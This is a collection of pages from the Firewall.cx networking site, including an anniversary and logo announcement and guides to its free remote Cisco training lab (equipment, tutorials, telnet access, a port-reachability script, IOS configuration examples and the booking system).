The compatibility matrix PDFs provide an invaluable map, ensuring that your network components are supported across different software versions. Make informed choices, plan upgrades with precision, and optimize your network's performance effortlessly.

Check the compatibility between various WLC hardware & virtual versions, Access Points and a plethora of Cisco software offerings, such as Cisco Identity Services Engine (ISE), Cisco Prime Infrastructure, innovative Cisco Spaces, and the versatile Mobility Express. This compatibility matrix extends far beyond devices, painting a holistic picture of how different elements of your Cisco ecosystem interact with one another.

Click here to visit the download page.


Firewall.cx: 15 Years’ Success – New Logo – New Identity – Same Mission

This December (2015) is a very special one. It signals 15 years of passion, education, learning, success and non-stop ‘routing’ of knowledge and technical expertise to the global IT community.

What began 15 years ago as a small pitiful website, with the sole purpose of simplifying complicated networking & security concepts and sharing them with students, administrators, network engineers and IT Managers, went on to become one of the most recognised and popular network security websites in the world.

Thanks to a truly dedicated and honest team, created mainly after our forums kicked in on the 24th of October 2001, Firewall.cx was able to rapidly expand and produce more high-quality content that attracted not only millions of new visitors but also global vendors.

Our material was all of a sudden used at colleges and universities and referenced by thousands of engineers and sites around the world, and then Cisco Systems referenced Firewall.cx resources in its official global CCNA Academy Program!

Today we look back and feel extremely proud of our accomplishment and, after all the recognition, positive feedback from millions and success stories from people who moved forward in their professional careers thanks to Firewall.cx, we feel obligated to continue working hard to help this amazing IT community.

Readers who have been following Firewall.cx since the beginning will easily identify the colourful Firewall.cx logo that has been with us since the site first went online. While we’ve changed the site’s design & platform multiple times the logo has remained the same, a piece of our history to which users can relate.

Obviously times have changed since 2000 and we felt (along with many other members) that it was time to move forward and replace our logo with one that will better suit the current Firewall.cx design & community, but at the same time make a real statement about who we are and what our mission is.

So, without any further delay, we would like to present to our community the new Firewall.cx logo:

Firewall.cx - New Logo - The Site for Networking Professionals

 

Explaining Our New Logo

Our new logo communicates what Firewall.cx and its community are all about. The new slogan precisely explains what we do: Route (verb) Information (knowledge) and Expertise to our audience of Network Professionals – that’s you. Of course, we still remain The No.1 Site for Networking Professionals :)

The icon on the left is a unique design that tells two stories:

  1. It’s a router, similar to Cisco’s popular Visio router icons, symbolising the “routing” process of information & expertise mentioned in our slogan.
  2. It symbolises four IT professionals: three represent our community (red) – that’s you, and the fourth (blue) is the Firewall.cx team. All four IT professionals are connected (via their right arm) and share information with each other (the arrows).

We hope our readers will embrace the new logo as much as we did and continue to use Firewall.cx as a trusted resource for IT Networking and Security topics.

On behalf of the Firewall.cx Team - Thank you for all your support. We wouldn’t be here without you.

Chris Partsenidis
Founder & Editor-in-Chief

Firewall.cx Free Cisco Lab: Equipment Photos

Our Cisco lab equipment has been installed in a 26U 19-inch rack, complemented by blue neon lighting and a 420VA UPS to keep everything running smoothly should a blackout occur.

The pictures taken show equipment used in all three labs. Please click on the picture of your choice to load a larger version.

cisco-lab-pictures-3-small

The 2912XL responsible for segmenting the local network, ensuring each lab is kept in its own isolated environment.


cisco-lab-pictures-7
Cisco Lab No.1 - The lab's Catalyst 1912 supporting two cascaded 1603R routers, and a 501 PIX Firewall.



cisco-lab-pictures-6
Cisco Lab No.2 - The lab's two 1603R routers.




cisco-lab-pictures-6
Cisco Lab No.3 - Three high-end Cisco switches flooded in blue lighting, making VLAN services a reality.




Cisco Lab No.3 - Optical links connecting the three switches together, permitting complex STP scenarios.


Firewall.cx Free Cisco Lab: Tutorial Overview

The Free Cisco lab tutorials were created to help our members get the most out of our labs by providing a step-by-step guide to completing specific tasks that vary in difficulty and complexity.

While you are not restricted to these tutorials, we do recommend you take the time to read through them as they cover a variety of configurations designed to enhance your knowledge and experience with these devices.

As one would expect, the first tutorials are simple and designed to help you move gradually into deeper waters. As you move on to the rest of the tutorials, the difficulty will increase noticeably, making the tutorials more challenging.

NOTE: In order to access our labs, you will need to open TCP ports 2001 to 2010. These ports are required so you can telnet directly into the equipment.

Following is a list of available tutorials:

Task 1: Basic Router & Switch Configuration

Router: Configure router's hostname and Ethernet interface. Insert a user mode and privilege mode password, enable secret password, encrypt all passwords, configure VTY password. Perform basic connectivity tests, check nvram, flash and system IOS version. Create a banner motd.

Switch: Configure switch's hostname, Ethernet interface, System name, Switching mode, Broadcast storm control, Port Monitoring, Port configuration, Port Addressing, Network Management, Check Utilisation Report and Switch statistics.

Task 2: Intermediate Router Configuration

Configure the router to place an ISDN call toward a local ISP using PPP authentication (CHAP & PAP). Set the appropriate default gateway for this stub network and configure simple NAT Overload to allow internal clients to access the Internet. Ensure the call is disconnected after 5 minutes of inactivity.

Configure Access Control Lists to restrict telnet access to the router from the local network. Create a local user database to restrict telnet access to specific users.

Block all ICMP packets originating from the local LAN towards the Internet and allow the following Internet services to the local LAN: www, dns, ftp, pop & smtp. Ensure you apply the ACLs to the router's private interface.

Block all incoming packets originating from the Internet.


Firewall.cx Free Cisco Lab: Our Partners

Our Cisco Lab project is a world first; there is no other Free Cisco Lab offered anywhere in the world! Our technical specifications and the quality of our lab mark a new milestone in free online education, matching the spirit in which this site was created.

While the development of our lab continues we publicly acknowledge and thank the companies that have made this dream a reality from which you can benefit, free of charge!

Each contributor is recognised as a Gold or Silver Partner.

 

cisco-lab-partners-1

logo-gfi
cisco-lab-partners-datavision

 

 

cisco-lab-partners-2

 

cisco-lab-partners-symantecpress

 

cisco-lab-partners-ciscopress

cisco-lab-partners-prenticehall

cisco-lab-partners-addison-wesley

Firewall.cx Free Cisco Lab: Access and Help

Connecting to the Lab Equipment

In order to access our equipment, the user must initiate a 'telnet' session to each device. The telnet session may be initiated using either of the following two ways:

1) By clicking on the equipment located on the diagram above. If your web browser supports external applications, once you click on a diagram's device, a DOS-based telnet window will open and you'll receive the Cisco Lab welcome screen.

Note: The above method will NOT work with Internet Explorer 7, due to security restrictions.

2) Manually initiating a telnet session. On each diagram, note the device port list in the lower left-hand corner. These are the ports you need to telnet into in order to access the equipment your lab consists of. You can either use a program of your choice, or open a traditional DOS-based command window by clicking on the "Start" button, selecting "Run" and entering "command" (Windows 95, 98, Me) or "cmd" (Windows 2000, XP, 2003). At the DOS prompt enter:

c:\> telnet ciscolab.no-ip.org xxxx

where 'xxxx' is substituted with the device port number as indicated on the diagram.

For example, if you wanted to connect to a device that uses device port 2003, the required command would be: telnet ciscolab.no-ip.org 2003

You need to repeat this step for each device you need to telnet into.
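If you want to confirm beforehand that your firewall allows the required ports (TCP 2001 to 2010, as noted in the tutorial overview), a small sketch such as the one below can test reachability. It simply uses Python's standard socket module and is offered only as an illustration; it is not part of the lab system itself:

import socket

HOST = "ciscolab.no-ip.org"

# Illustrative reachability check only; not part of the lab system.
# Try each device port the lab uses and report whether a TCP connection succeeds.
for port in range(2001, 2011):
    try:
        with socket.create_connection((HOST, port), timeout=5):
            print(f"Port {port}: reachable")
    except OSError as err:
        print(f"Port {port}: not reachable ({err})")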

Cisco 'Secret' Passwords

Each lab requires you to set the 'enable secret' password. It is imperative you use the word "cisco", so our automated system is able to reset the equipment for the next user.

We ask that you kindly respect this request to ensure our labs are accessible and usable by everyone.

Since all access attempts are logged by our system, users found storing other 'enable secret' passwords will be blocked from the labs and site in general.

To report any errors or inconsistencies with regards to our lab system, please use the Cisco lab forum.

With your help, we can surely create the world's friendliest and most resourceful Free Cisco Lab!


Firewall.cx Free Cisco Lab: Setting Your Account GMT Timezone

Firewall.cx's Free Cisco Labs make use of a complex system in order to allow users from all over the world to create a booking in their local timezone. A prerequisite for a successful booking is that the user has the correct GMT Timezone setting in their Firewall.cx profile, as this is used to calculate and present the scheduling system in the user's local time.

If you are unsure what GMT Timezone you are in, please visit https://greenwichmeantime.com/ and click on your country.

You can check your GMT Timezone by viewing your account profile. This can be easily done by firstly logging into your account and then clicking on "Your Account" from the site's main module:

cisco-lab-gmt-1

Next, click on "Your Info" as shown in the screenshot below:

cisco-lab-gmt-2

 

Finally, scroll down to the 'Forums Timezone' and click on the drop-down box to make your selection.

cisco-lab-gmt-3

Once you've selected the correct timezone, scroll to the bottom of the page and click on "Save Changes".

Please note that you will need to adjust your GMT Timezone as you enter/exit daylight savings throughout the year.

You are now ready to create your Cisco Lab booking!

red-line


Firewall.cx Free Cisco Lab: Equipment & Device List

No lab is possible without the right equipment to allow coverage of simple to complex scenarios.

With limited income and our sponsors' help, we've done our best to populate our lab with the latest models and technologies offered by Cisco. Our current investment exceeds US $10,000 and we will continue to purchase more equipment as our budget permits.

We are proud to present to you the following equipment that will be made available in our lab:

Routers
3 x 1600 series routers including BRI S/T, Serial and Ethernet interfaces
1 x 1720 series router including BRI S/T, Serial and Fast Ethernet interfaces
1 x 2610 series router with BRI S/T, Wic-1T, BRI 4B-S/T and Ethernet interfaces
1 x 2612 series router with BRI S/T, Wic-1T, Ethernet and Token Ring interfaces
1 x 2620 series router with Wic-1T and Fast Ethernet interfaces
2 x 3620 series routers with BRI S/T, Wic-1T, Wic-2T, Ethernet, Fast Ethernet interfaces
1 x 1760 series router supporting Cisco Call Manager Express with Fast Ethernet & Voice Wic
1 x Cisco 2522 Frame relay router simulator
Total: 11 Routers
 
Switches
1 x 1912 Catalyst switch with older menu-driven software
1 x 2950G-12T Catalyst switch with 12 Fast Ethernet ports, 2 Gigabit ports (GBIC)
2 x 3524XL Catalyst switches with 24 Fast Ethernet ports, 2 Gigabit ports (GBIC)
Total: 4 Switches
 
Firewall
1 x Pix Firewall 501 v6.3 software
 
Other Devices/Equipment
  • Gbics for connections between catalyst switches
  • Multimode and Singlemode fiber optic cables for connection between switches
  • DB60 x-over cables to simulate leased lines
  • 420 VA UPS to ensure lab availability during power shortage
  • CAT5 UTP cables & patch cords
  • 256/128K Dedicated ADSL Connection for Lab connectivity

red-line


Firewall.cx Free Cisco Lab: Equipment & Diagrams

Each lab has been designed to cover specific topics of the CCNA & CCNP curriculum, but is in no way limited to them, as you are given the freedom to execute all commands offered by the device's IOS.

While the lab tutorials exist only as guidelines to help you learn how to implement the services and features provided by the equipment, we do not restrict their usage in any way. This effectively means that full control is given to you and, depending on the lab, a multitude of variations to the lab's tutorial are possible.

Cisco Lab No.1 - Basic Router & Switch Configuration

The first Cisco Lab involves the configuration of one Cisco 1603R router and Catalyst 1912 switch. This equipment has been selected to suit the aim of this lab, which is to serve as an introduction to Cisco technologies and concepts.

The lab is in two parts, the first one covering basic IOS functions such as simple router and switch configuration (hostname, interface IP addresses, flash backup, banners etc).

The second part focuses on ISDN configuration and dialup, including PPP debugging, where the user is required to perform a dialup to an ISP via the lab's ISDN simulator. Basic access lists are covered to help enhance the lab further. Lastly, the user is able to ping real Internet IP addresses from the 1603R, because the back-end router (ISP router) is connected to the lab's Internet connection.

cisco-lab-diagrams-lab-1

 

Equipment Configuration:

Cisco Catalyst 1912
FLASH: 1MB
IOS Version: v8.01.02 Standard Edition
Interfaces:12 Ethernet / 2 Fast Ethernet

 

Cisco 1603R
DRAM / FLASH: 16MB / 16MB
IOS Version: 12.3(22)
Interfaces: 1 Ethernet / 1 Serial / 1 ISDN BRI

red-line

Cisco Lab No.2 - Advanced Router Configuration

The second Cisco lab focuses on advanced router configuration by covering topics such as WAN connectivity (leased lines) with ISDN backup functionality thrown into the package. GRE (encrypted) tunnels, DHCP services with a touch of dynamic routing protocols such as RIPv2 are also included.

As you can appreciate, the complexity here is greater and therefore the lab is split into 4 separate tutorials to ensure you get the most out of each one.

You will utilise all three interfaces available on the routers: Ethernet, ISDN and Serial. The primary WAN link is simulated using a back-to-back serial cable and the ISDN backup capability is provided through our lab's dedicated ISDN simulator.

cisco-lab-diagrams-lab-2

 

Equipment Configuration:

Cisco 1603R (router 1)
DRAM / FLASH: 18MB / 16MB
IOS Version: 12.3(6a)
Interfaces: 1 Ethernet / 1 Serial / 1 ISDN BRI

 

Cisco 1603 (router 2)
DRAM / FLASH: 24MB / 16MB
IOS Version: 12.3(6a)
Interfaces: 1 Ethernet / 1 Serial / 1 ISDN BRI

red-line

Cisco Lab No.3 - VLANs - VTP & InterVLAN Routing

The third Cisco lab aims to cover the popular VLAN & InterVLAN routing services, which are becoming very common in large complex networks.

The lab consists of two Catalyst 3500XL switches and one Catalyst 2950G as backbone switches, attached to a Cisco 2620 router.

Our third lab has been designed to fully support the latest advanced services offered by Cisco switches such as the creation of VLANs and configuration of the popular InterVLAN Routing service amongst all VLANs and switches.

Advanced VLAN features, such as VLAN Trunking Protocol (VTP) and trunk links throughout the backbone switches, are tightly integrated into the lab's specifications and extend to support a number of VLAN-related services, just as they would in a real-world environment.

Further extending this lab's potential, we've added EtherChannel support, allowing you to gain experience in aggregating multiple low-bandwidth (100Mbps) interfaces between switches into one large high-bandwidth pipe (400Mbps in our example).
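
As an illustration, bundling four 100Mbps ports into a single logical link on a generic Catalyst IOS switch looks roughly like the excerpt below. The older 3500XL software uses the 'port group' command instead of 'channel-group', and the member port numbers here are placeholders, so adjust to the platform you are working on:

! Repeat for each of the four member ports
interface FastEthernet0/1
 channel-group 1 mode on
interface FastEthernet0/2
 channel-group 1 mode on
interface FastEthernet0/3
 channel-group 1 mode on
interface FastEthernet0/4
 channel-group 1 mode on
!
! The bundle then appears as a single logical interface
interface Port-channel1
 switchport mode trunk
!
! On newer Catalyst IOS, verify with: show etherchannel summary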

Lastly, STP (Spanning Tree Protocol) is fully supported. The lab guides you through the use of STP to create fully redundant connections between the backbone switches. You are able to disable backbone links, simulating link loss, and monitor STP as it activates previously blocked links.
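
The illustrative commands below show the sort of PVST+ tuning and verification involved. The VLAN number and priority value are placeholders, and the availability of each command depends on the switch's IOS version:

! Make this switch the preferred root bridge for VLAN 10
spanning-tree vlan 10 priority 8192
!
! From privileged EXEC mode, watch ports move through the STP states
! (blocking / listening / learning / forwarding) after a link is shut down:
!   show spanning-tree vlan 10
!   show spanning-tree interface FastEthernet0/1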

cisco-lab-diagrams-lab-3

This lab requires you to perform the following tasks:

- Basic & advanced VLAN configuration

- Trunk & Access link configuration

- VLAN Database configuration

- VTP (VLAN Trunking Protocol) server, client and transparent mode configuration

- InterVLAN routing using a 2620 router (Router on a stick)

- EtherChannel link configuration

- Simple STP configuration, Per VLAN STP Plus (PVST+) & link recovery

 

Equipment Configuration:

Cisco 2620 (router 1)
DRAM / FLASH: 48MB / 32MB
IOS Version: 12.2(5d)
Interfaces: 1 Fast Ethernet
 
Cisco Catalyst 3500XL (switch 1)
DRAM / FLASH: 8MB / 4MB
IOS Version: 12.0(5.2)XU - Enterprise Edition Software
Interfaces: 24 Fast Ethernet / 2 Gigabit Ethernet with SX GBIC modules installed
 
Cisco Catalyst 3500XL (switch 2)
DRAM / FLASH: 8MB / 4MB
IOS Version: 12.0(5.4)WC(1) - Enterprise Edition Software
Interfaces: 24 Fast Ethernet / 2 Gigabit Ethernet with SX & LX GBIC modules installed
 
Cisco Catalyst 2950G-12-EI (switch 3)
DRAM / FLASH: 20MB / 8MB
IOS Version: 12.1(6)EA2
Interfaces: 12 Fast Ethernet / 2 Gigabit Ethernet with SX & LX GBIC modules installed

Firewall.cx Free Cisco Lab: Online Booking System


The Online Booking System is the first step required for any user to access our lab. The process is fairly straightforward and designed to ensure even novice users can use it without problems.

How Does It Work?

To make a valid booking on our system you must be a registered Firewall.cx user. Existing users are able to access the Online Booking System from inside their Firewall.cx account.

Once registered, you will be able to log into your Firewall.cx account and access the Online Booking System.

The Online Booking System was customised to suit our lab's needs and provide a booking schedule for all resources (labs) available to our community. Once logged in, you are able to select the resource (lab) you wish to access, check its availability and finally proceed with your booking.

There are a number of parameters that govern the use of our labs to ensure fair usage and avoid abuse of this free service. The maximum session time for each lab depends on its complexity: naturally, the more complex the lab, the more time you will be allowed. When your time has expired, you will automatically be logged off and the lab equipment will be reset for the next scheduled user.

Following are a number of screenshots showing how a booking is created. You will also find the user's control panel, from which you can perform all the functions described here.

Full instructions are always available via the 'Help' link located in the upper right corner of the booking system's page.

The Online Booking System login page:

cisco-lab-booking-system-1


 

The booking system control panel:

cisco-lab-booking-system-2


The lab scheduler/calendar:

cisco-lab-booking-system-3


Creating a booking:

cisco-lab-booking-system-4


User control panel showing current reservations:

cisco-lab-booking-system-5

